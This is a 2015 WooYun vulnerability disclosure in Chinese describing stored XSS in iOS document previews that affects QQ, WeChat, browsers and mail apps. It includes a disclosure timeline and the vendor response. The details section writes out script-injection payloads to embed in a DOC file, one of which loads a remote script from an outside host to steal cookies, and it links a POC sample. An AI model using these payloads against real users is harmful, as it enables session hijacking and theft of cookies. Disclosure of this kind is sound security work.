当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-094791
漏洞标题:
IOS全系统某处储存xss导致跨域命令执行(QQ、微信、浏览器、邮箱等中枪)
相关厂商:
ios
漏洞作者:
mango
提交时间:
2015-01-30 20:54
修复时间:
2015-05-05 11:38
公开时间:
2015-05-05 11:38
漏洞类型:
设计错误/逻辑缺陷
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-01-30: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向第三方安全合作伙伴开放
2015-03-31: 细节向核心白帽子及相关领域专家公开
2015-04-10: 细节向普通白帽子公开
2015-04-20: 细节向实习白帽子公开
2015-05-05: 细节向公众公开

简要描述:


最后一次编辑,经过测试发现早在很久以前ios版本就存在了,可能存有很多年了,可以做到跨域命令执,可获取任意用户浏览网站cookie,危害非常大。
尖刀收小伙伴了~~
想了很久,还是提交乌云了,乌云曾经也是我学习的地方,是乌云让我成长,所以我认为不管怎样,人总要落叶归根的~ 滴水之恩应当涌泉相报~~~么么哒乌云~

详细说明:

一、详细说明:
在IOS 系统中 都默认可以打开DOC文件 包括QQ 微信 浏览器等等
那么我们需要构造一个含有xss的文档
如图
在DOC文档中插入 特殊字符code

}</style><script>alert(/xss/)</


然后保存 发送给好友 或者微信好友 打开就会被xss

@)_2)ZGKU8TL1I0KU)1YIBH.png


08B02CA66EBEE0E9A93A02B3087187E1.png


68D6897D104C403B48F40798BBF0A7DF.png


Z9H9M)[6@I8PGZUEL~4QV07.jpg


构造短地址(短地址首页改为xss)

}</style><script src=http://18.gy>


7_U8X7{0M%DO93FTGB4ED5K.png


我们打开构造好POC 我们可以选择插入邮件系统发送给受害者 受害者打开后如下

6E7B3D90505286B56331DB7CC319249D.png


所以可以跨域劫持用户cookie 包括命令执行等

漏洞证明:

IMG_0452.PNG


POC样本 http://yunpan.cn/cKYGNhw5N9s2T (提取码:6b5d)
特别感谢 0x_Jin 是他的漏洞给了我一些帮助和一些跟好的思维方式~~再次感谢。

修复方案:

版权声明:转载请注明来源 mango@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-02-04 11:36

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无